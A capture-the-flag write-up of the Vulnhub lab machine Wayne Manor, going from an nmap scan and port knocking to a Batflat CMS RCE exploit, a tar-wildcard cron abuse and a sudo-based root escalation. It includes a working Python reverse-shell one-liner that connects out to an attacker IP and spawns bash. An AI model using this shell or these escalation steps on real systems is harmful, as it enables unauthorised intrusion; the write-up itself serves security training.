Vulnhub Wayne Manor: 1 Write-up

This is the walk-through of vulnhub Wayne Manor:1. If you want to download you can get it here.

Nmap scan:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC -p21,22,80 192.168.2.12
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–23 17:16 UTC
Nmap scan report for waynemanor.com (192.168.2.12)
Host is up (0.0026s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r — r — 1 0 0 263 Mar 26 23:03 info.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.2.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 — secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e4:b9:54:24:6c:42:0b:64:30:a4:5f:57:ed:d3:a3:91 (RSA)
| 256 d5:79:0c:fa:91:fb:8d:f2:e7:86:62:c2:c7:88:8c:43 (ECDSA)
|_ 256 29:0f:34:05:ed:24:1a:f3:79:e2:97:99:cb:bc:a8:0a (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-generator: Batflat
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Wayne Manor Blog — Wayne Manor
MAC Address: 00:0C:29:E1:0E:ED (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.25 seconds

When I checked port 80 in browser with IP, I got below page.

Then I added <machine-ip> waynemanor.com to /etc/hosts file. After that I got the below page.

When I scrolled down little bit, on the same page I saw

This is indicating we need to do port knock on ports 300,350 and 400. To perform port knocking, I used knock utility.

After this, I again used nmap to scan open ports and this time port 21 is open which is filtered previously.

As anonymous login is allowed, I logged in into the FTP and downloaded the info.txt

Now let’s move to port 80. Both dirb and gobuster gives long output.

When I open /administration I got below page:

I don’t have any idea what is batflat is, so I searched it on google, and came to know that it is a CMS. I searched for batflat CMS exploit, and it gives me authenticated RCE is there. The exploit can be found at exploit-db

This exploit need target URL, username, password, IP and port on which we need reverse shell.

Started the netcat listener on port 443 and execute the exploit, got the reverse shell.

After getting reverse shell, I visited the /home/batman directory. In ,web directory there is a script.sh file, which backup the file /var/www/htm with wildcard which is dangerous.

So to get reverse shell, I followed the steps mentioned here.

Created payload using msfvenom on kali machine.

msfvenom

Append it to shell.sh in /var/www/html

After waiting for few minutes I did not get the shell, so decided to use python code to get reverse shell. So I created a shell.sh file with below code on my machine. Download the file on victim.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.6.2”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

Started the netcat listener on port 4444 on kali. And got shell as batman.

As first step of enumeration, I use sudo -l command and is showed me user batman can run /usr/sbin/service as root without using password.

gtfobins shows the way how to get shell using service, if we have sudo access.

Got the root shell.

root flag

Hope you enjoyed the write-up. Thanks for reading.

References: